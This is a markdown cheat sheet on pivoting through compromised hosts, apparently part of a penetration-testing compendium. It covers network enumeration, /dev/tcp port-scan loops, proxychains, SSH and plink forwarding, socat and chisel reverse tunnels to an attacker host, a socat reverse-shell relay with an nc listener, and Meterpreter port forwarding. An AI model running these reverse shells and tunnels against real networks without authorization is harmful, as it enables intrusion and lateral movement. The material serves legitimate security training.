killchain-compendium/pivoting.md

3.9 KiB

Pivoting

  • Tunnelling/Proxying
  • Port Forwarding

Enumeration

Using material found on the machine and preinstalled tools

  • arp -a
  • /etc/hosts or C:\Windows\System32\drivers\etc\hosts
  • /etc/resolv.conf
  • ipconfig /all
  • nmcli dev show

Statically compiled tools](https://github.com/andrew-d/static-binaries.git)

Scripting Techniques

for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
  • Using local tools through a proxy like nmap

Tools

Enumerating a network using native and statically compiled tools

Proxychains / FoxyProxy

  • Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server
    proxychains nc <IP> <PORT>
    proychains nmap <IP>
    
    • Use /etc/proxychains.conf or ./proxychains.confcontaining:
    [ProxyList]
    # add proxy here ...
    # meanwhile
    # defaults set to "tor"
    socks4  127.0.0.1 9050
    #socks5 127.0.0.1 1337
    # proxy_dns
    
  • FoxyProxy

SSH port forwarding and tunnelling (primarily Unix)

  • LocalPortForwarding
    ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
    
  • Dynamic Port Forwarding
    ssh -D <Port> <user>@<Jumpserver> -fN
    
  • Reverse Proxy
    ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
    

plink.exe (Windows)

cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
  • Key generation
    puttygen <keyfile> -o key.ppk
    

Socat

  • Reverse shell on target via
    ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
    
    • Attacking bind shell
    sudo nc -lvnp 443
    
  • Relay via Jumpserver
    ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
    
  • Quiet Port Forwarding
    • On attacker
    socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
    
    • On relay server
    ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
    
    • Open localhost:8000
  • Processes are backgrounded via &. Therefore, the process can be quit by using the corresponding bg number like kill %1.

Chisel

  • Does not require SSH on target

  • Reverse Proxy

    • Bind port on attacker
    ./chisel server -p <ListeningPort> --reverse &
    
    • Reverse port on target/proxy
    ./chisel client <attacker-IP>:<attacker-Port> R:socks &
    
    • proxychains.conf contains
    [ProxyList]
    socks5 127.0.0.1 <Listening-Port>
    
  • Forward SOCKS Proxy

    • Proxy/compromised machine
    ./chisel server -p <Listen-Port> --socks5
    
    • On attacker
    ./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
    
  • Remote Port Forward

    • On attacker
    ./chisel server -p <Listen-Port> --reverse &
    
    • On forwarder
    ./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
    
  • Local Port Forwarding

    • On proxy
    ./chisel server -p <Listen-Port>
    
    • On attacker
    ./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
    

sshuttle

  • pip install sshuttle
  • sshuttle -r <user>@<target> <subnet/CIDR>
  • or automatically determined
sshuttle -r <user>@<target> -N
  • Key based auth
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
  • Exclude servers via -x, for example the target/gateway server

Meterpreter

  • Meterpreter with payload set payload linux/x64/meterpreter_reverse_tcp and
portfwd add -l 22 -p 22 -r 127.0.0.1